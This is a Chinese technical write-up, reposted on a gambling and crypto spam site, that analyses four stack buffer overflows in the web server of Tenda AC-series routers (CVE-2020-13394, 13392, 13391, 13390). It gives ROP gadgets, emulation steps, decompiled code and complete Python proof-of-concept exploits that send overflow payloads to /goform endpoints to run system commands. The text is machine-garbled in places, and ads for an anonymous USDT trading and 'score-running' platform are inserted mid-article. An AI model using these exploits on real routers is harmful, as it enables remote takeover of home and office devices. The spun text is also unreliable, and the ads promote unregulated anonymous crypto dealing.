欢迎进入UG环球官网(环球UG)!

usdt官方交易网(www.caibao.it):Tenda路由器CVE:四个缓冲区溢露马脚剖析复现

admin3个月前83

USDT第三方支付

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

前言

CVE-2020-13394 An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multiTD01, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetNetControlList list parameter for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.
CVE-2020-13392 An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multiTD01, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/setcfm funcpara1 parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.
CVE-2020-13391 An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multiTD01, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetSpeedWan speed_dir parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.
CVE-2020-13390 An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multiTD01, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/addressNat entrys and mitInterface parameters for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.

这4个TendaCVE都是统一个程序的缓冲区溢露马脚,本文是基于US_AC15V1.0BR_V15.03.05.19_multi_TD01固件版本举行剖析复现的。

固件可在github下载:https://github.com/Snowleopard-bin/pwn/tree/master/IOT/Tenda_CVE-2018-16333

通用的gadget

╰─  ROPgadget --binary ./lib/libc.so.0 --only "pop"| grep r3
0x00018298 : pop {r3, pc}   ,gadget1
╰─  ROPgadget --binary ./lib/libc.so.0  | grep "mov r0, sp"
0x00040cb8 : mov r0, sp ; blx r3    ,gadget2

行使历程:

  1. 溢出后跳到第一个gadget1,控制r3寄存器为system函数地址,第一个pc控制为gadget2
  2. 跳转到gadget2后,控制r0为要执行的下令即可
  3. 执行system(cmd)

qemu用户级调试启动

安装qemu-user-static

sudo apt install qemu-user-static

安装完成后将qemu-arm-static赋值到文件系统目录squashfs-root下,启动httpd服务

cp $(which qemu-arm-static) ./qemu
sudo chroot ./ ./qemu ./bin/httpd

CVE-2020-13394

破绽的成因是web服务在处置post请求时,对list参数没有举行检查直接复制到栈上的一个局部变量中可导致栈溢出。定位到formSetQosBand函数。

//formSetQosBand
list = (char *)sub_2BA8C(a1, (int)"list", (int)&unk_E250C);
sub_7DD20(list, (int)"bandwidth.mode", 0xAu);

int __fastcall sub_7DD20(char *list, int a2, unsigned __int8 a3)
{
  char dest; // [sp+5CCh] [bp-260h]
  char *src; // [sp+81Ch] [bp-10h]
  list_1 = list;
  c = a3;
  memset(&s, 0, 0x40u);
  memset(&dest, 0, 0x100u);
  sub_7DB3C(v4);
  src = list_1;
  while ( 1 )
  {
    v58 = strchr(src, c);
    if ( !v58 )
      break;
    v59 = 0;
    *v58++ = 0;
    memset(&dest, 0, 0x100u);
    strcpy(&dest, src);

程序直接将list参数使用strcpy函数复制到栈变量dest中,容易造成栈溢出。

在qemu用户级调试中能看到挪用了system(cmd)就能说明乐成完成破绽行使了。
poc如下:

import requests
from pwn import *

cmd="echo hello"

'''
qemu-user
'''
libc_base = 0xf659c000

'''
qemu-system
libc_base = 0x76dab000
dosystemcmd = 0x76f930f0
'''

system = libc_base + 0x5A270
readable_addr = libc_base + 0x64144
mov_r0_ret_r3 = libc_base + 0x40cb8
pop_r3 = libc_base + 0x18298

payload = 'a'*0x260
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd


url = "http://192.168.198.140/goform/SetNetControlList"
cookie = {"Cookie":"password=12345"}
data = {"list": payload}
response = requests.post(url, cookies=cookie, data=data)
response = requests.post(url, cookies=cookie, data=data)
print(response.text)

CVE-2020-13392

破绽的成因是web服务在处置post请求时,对funcpara1参数没有举行检查直接复制到栈上的一个局部变量中可导致栈溢出。定位到formSetCfm函数。

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,
//formSetCfm
  v17 = (char *)sub_2BA8C(v2, (int)"funcname", (int)&unk_DFA30);
  if ( *v17 )
  {
    if ( !strcmp(v17, "save_list_data") )
    {
      funcpara1 = sub_2BA8C(v2, (int)"funcpara1", (int)&unk_DFA30);
      funcpara2 = (char *)sub_2BA8C(v2, (int)"funcpara2", (int)&unk_DFA30);
      sub_4EC58((int)funcpara1, funcpara2, '~');
    }
  }

  //sub_4EC58
  char s; // [sp+11Ch] [bp-58h]
  char *v10; // [sp+15Ch] [bp-18h]
  int v11; // [sp+160h] [bp-14h]
  char *v12; // [sp+164h] [bp-10h]

  memset(&s, 0, 0x40u);
  sprintf(&s, "%s.listnum", v6);
  SetValue(&s, "0");
  memset(&s, 0, 0x40u);
  memset(&v8, 0, 0x100u);
  sprintf(&s, "%s.list%d", v6, ++v11);
  result = GetValue((int)&s, (int)&v8);

在当剖析到存在参数funcname为save_list_data时,就会剖析提交的表单中的funcpara1参数,在sub_4EC58函数中使用sprintf函数直接将该参数复制到栈缓冲区中。而且由于参数funcpara1后面会接上.list字符串,因此在指定数令后面需要添加分号;

payload如下:

payload = 'a'*0x58
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd +';'

url = "http://192.168.198.140/goform/setcfm"
cookie = {"Cookie":"password=12345"}
data = {"funcname": 'save_list_data','funcpara1':payload}

CVE-2020-13391

破绽的成因是web服务在处置post请求时,对speed_dir参数没有举行检查直接复制到栈上的一个局部变量中可导致栈溢出。定位到formSetSpeedWan函数。

//formSetSpeedWan
  char s[32]; // [sp+30h] [bp-3Ch]
  void *v12; // [sp+50h] [bp-1Ch]
  char *v13; // [sp+54h] [bp-18h]
  char *speed_dir; // [sp+58h] [bp-14h]
  int v15; // [sp+5Ch] [bp-10h]

  speed_dir = sub_2BA8C(a1, "speed_dir", "0");
  v13 = sub_2BA8C(v2, "ucloud_enable", "0");
  v12 = sub_2BA8C(v2, "password", "0");
  GetValue("speedtest.flag", &nptr);

  sprintf(s, "{\"errCode\":%d,\"speed_dir\":%s}", v15, speed_dir);

剖析speed_dir参数后,使用sprintf函数,将speed_dir与{"errCode":0,"speed_dir":%s}名堂化字符串拼接起来赋值给栈变量。用户可控的空间在栈变量s偏移为25以后,而溢出偏移为0x3c,需要填充的字符数为35。

payload如下:

payload = 'a'*35
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd +';'

url = "http://192.168.198.140/goform/SetSpeedWan"
cookie = {"Cookie":"password=12345"}
data = {'speed_dir':payload}
response = requests.post(url, cookies=cookie, data=data)
response = requests.post(url, cookies=cookie, data=data)
print(response.text)

CVE-2020-13390

破绽的成因是web服务在处置post请求时,对entrys和mitInterface参数没有举行检查直接复制到栈上的一个局部变量中可导致栈溢出。定位到fromAddressNat函数。

//fromAddressNat
  char s; // [sp+114h] [bp-318h]
  char v7; // [sp+314h] [bp-118h]
  void *v8; // [sp+414h] [bp-18h]
  void *v9; // [sp+418h] [bp-14h]
  void *v10; // [sp+41Ch] [bp-10h]

  v4 = a1;
  memset(&v5, 0, 0x100u);
  entrys = sub_2BA8C(v4, "entrys", &unk_E5D48);
  mitInterface = sub_2BA8C(v4, "mitInterface", &unk_E5D48);
  sprintf(&s, "%s;%s", entrys, mitInterface);

程序剖析entrys和mitInterface参数后直接使用sprintf函数赋值到栈变量s中,容易造成栈溢出。

payload如下:

padding = 'b'*(0x318-1)
payload = ''
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd

url = "http://192.168.198.140/goform/addressNat"
cookie = {"Cookie":"password=12345"}
data = {'entrys':padding, 'mitInterface':payload}

总结

汇总一下以上4个CVE的对应的qemu用户级调试的poc

import requests
from pwn import *

cmd="echo hello"

'''
qemu-user
'''
libc_base = 0xf659c000

'''
qemu-system
libc_base = 0x76dab000
dosystemcmd = 0x76f930f0
'''

system = libc_base + 0x5A270
readable_addr = libc_base + 0x64144
mov_r0_ret_r3 = libc_base + 0x40cb8
pop_r3 = libc_base + 0x18298


padding = 'b'*(0x318-1)
payload = ''
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd

url = "http://192.168.198.140/goform/addressNat"
cookie = {"Cookie":"password=12345"}
data = {'entrys':padding, 'mitInterface':payload}
response = requests.post(url, cookies=cookie, data=data)
response = requests.post(url, cookies=cookie, data=data)
print(response.text)

'''
, CVE-2020-13394

payload = 'a'*0x260
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd

url = "http://192.168.198.140/goform/SetNetControlList"
cookie = {"Cookie":"password=12345"}
data = {"list": payload}


, CVE-2020-13392
payload = 'a'*0x58
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd +';'

url = "http://192.168.198.140/goform/setcfm"
cookie = {"Cookie":"password=12345"}
data = {"funcname": 'save_list_data','funcpara1':payload}


, CVE-2020-13391
payload = 'a'*35
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd +';'

url = "http://192.168.198.140/goform/SetSpeedWan"
cookie = {"Cookie":"password=12345"}
data = {'speed_dir':payload}


, CVE-2020-13390
padding = 'b'*(0x318-1)
payload = ''
payload+= p32(pop_r3) + p32(system) + p32(mov_r0_ret_r3) + cmd

url = "http://192.168.198.140/goform/addressNat"
cookie = {"Cookie":"password=12345"}
data = {'entrys':padding, 'mitInterface':payload}

'''

另外提一下CVE-2020-13393和CVE-2020-13389,在CVE形貌中,破绽成因都是栈溢出,然则经太过析,它们着实是堆溢出,不能直接套poc的模板笼罩返回返回地址。

上一篇 下一篇

猜你喜欢

网友评论

  • 2021-05-21 00:01:02

    阳光在线企业邮局(原诚信在线官网现平心在线)现已开放阳光在线电脑版、手机版下载、企业邮局登录、会员开户、代理合作等服务。很独特呢

  • 2021-06-25 00:02:57

    赣州信息港赣州信息港是赣州最热门的信息提供网站,全网内容全面、丰富、新颖,汇集优质信息资源,不仅有头版头条的“今日聚焦”栏目、热门标签更新,助您理解最新的时政要闻以及社会热点话题,还有各种旅游、美食推荐以及人才招聘、投资理财信息,帮您第一时间获悉您感兴趣的领域资源,本网站是本地知名领先的信息搜索平台与新闻频道,优质的用户体验,有用的信息公告,海量的精彩内容,尽在赣州信息港。想一百星好评啊

随机文章
热门文章
热评文章
热门标签